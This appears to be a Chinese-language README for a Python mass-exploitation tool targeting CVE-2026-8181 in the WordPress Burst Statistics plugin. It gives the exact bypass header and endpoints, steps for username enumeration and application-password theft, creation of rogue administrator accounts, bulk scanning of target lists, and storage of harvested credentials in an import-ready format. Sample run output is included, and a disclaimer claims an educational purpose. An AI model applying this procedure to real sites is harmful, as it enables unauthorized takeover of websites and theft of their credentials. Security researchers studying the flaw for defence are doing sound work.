Python 2.7 版本的 Burst Statistics 插件漏洞(CVE-2026-8181)利用工具,允许未认证攻击者绕过 REST API 认证,获取应用密码,并在存在漏洞的 WordPress 站点上创建新的管理员用户。
⚠️ 免责声明
此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是非法的。请仅在你拥有或拥有明确许可的网站上使用。 更多免责声明请参阅 Jenderal92 封面上的声明。你可以点击 这里 查看。
CVE-2026-8181 影响 WordPress 的 Burst Statistics 插件(补丁之前的版本)。该漏洞位于 REST API 认证机制中,允许攻击者:
X-BURSTMAINWP 标头绕过认证/burst/v1/mainwp-auth 端点获取应用密码/、/wordpress、/wp)/wp-json/wp/v2/users 或作者 ID 重定向进行用户名枚举res_login.txt – 简洁的管道分隔的 REST API 凭据(易于解析/导入)full_res_login.txt – 包含访问验证和应用密码的完整可读报告requests 库pip install requests
准备目标列表文件(每行一个域名或 IP,可带 http:///https:// 前缀)。
示例 targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
运行漏洞利用工具:
python2 CVE-2026-8181.py targets.txt
res_login.txt – REST API 凭据(每个易受攻击的目标一行)full_res_login.txt – 详细报告| 参数 | 描述 |
|---|---|
list.txt | 包含目标 URL 的文件路径 |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] 总目标数: 2
[*] 线程数: 10
[*] 基础路径: ['', '/wordpress', '/wp']
[*] 正在扫描: example.com
尝试路径: /
检测到用户名: admin
[+] 存在漏洞!REST API 绕过成功
[+] 应用密码已获取!
[+] 用户名: admin
[+] 应用密码: xxxx xxxx xxxx
[+] Base64 令牌: YWRtaW46eHh4eA==
[+] 已确认访问权限: WordPress 设置
[+] 已确认访问权限: 已安装插件
[+] 已确认访问权限: 管理员用户
[+] 通过 REST API 创建的管理员用户: wp_abc123
[+] 结果已保存到 res_login.txt 和 full_res_login.txt
res_login.txt – 简洁的 REST API 凭据每行采用以下管道分隔格式:
target|username|password|email|user_id
示例:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
此格式非常适合:
cut、grep 或 Excel 快速检查full_res_login.txt – 完整详细报告对于每个易受攻击的目标,脚本会附加一个可读块:
============================================================
Target: http://example.com
============================================================
[+] 访问验证:
[+] WordPress 设置
[+] 已安装插件
[+] 管理员用户
[+] REST API 凭据:
用户名: wp_abc123
密码: random12char
邮箱: [email protected]
用户 ID: 42
URL: http://example.com/wp-admin/
注意: 使用 X-BURSTMAINWP 标头
[+] 应用密码:
用户名: admin
应用密码: xxxx xxxx xxxx
Base64 令牌: YWRtaW46eHh4eA==
注意: 如果应用密码端点不可用或未返回令牌,则该部分将显示
FAILED。
http:// 前缀,去除尾部斜杠。/、/wordpress 和 /wp 作为 WordPress 基础目录。/wp-json/wp/v2/users 或利用 ?author=N 重定向。X-BURSTMAINWP: 1 + 基本认证(用户名 + 虚拟密码 CVE-2026-8181)。如果端点 /wp-json/wp/v2/users/me?context=edit 返回 200,则站点存在漏洞。/wp-json/burst/v1/mainwp-auth 以获取应用密码令牌。/settings、/plugins、/users 的访问权限。你可以在脚本中修改以下变量:
THREADS – 并发线程数(默认 10)BASE_PATHS – 要检查的其他 WordPress 子目录requests 超时值本项目仅用于教育目的。使用风险自负。
POST /wp-json/wp/v2/users 创建新的管理员账号。res_login.txt,将完整详细信息写入 full_res_login.txt。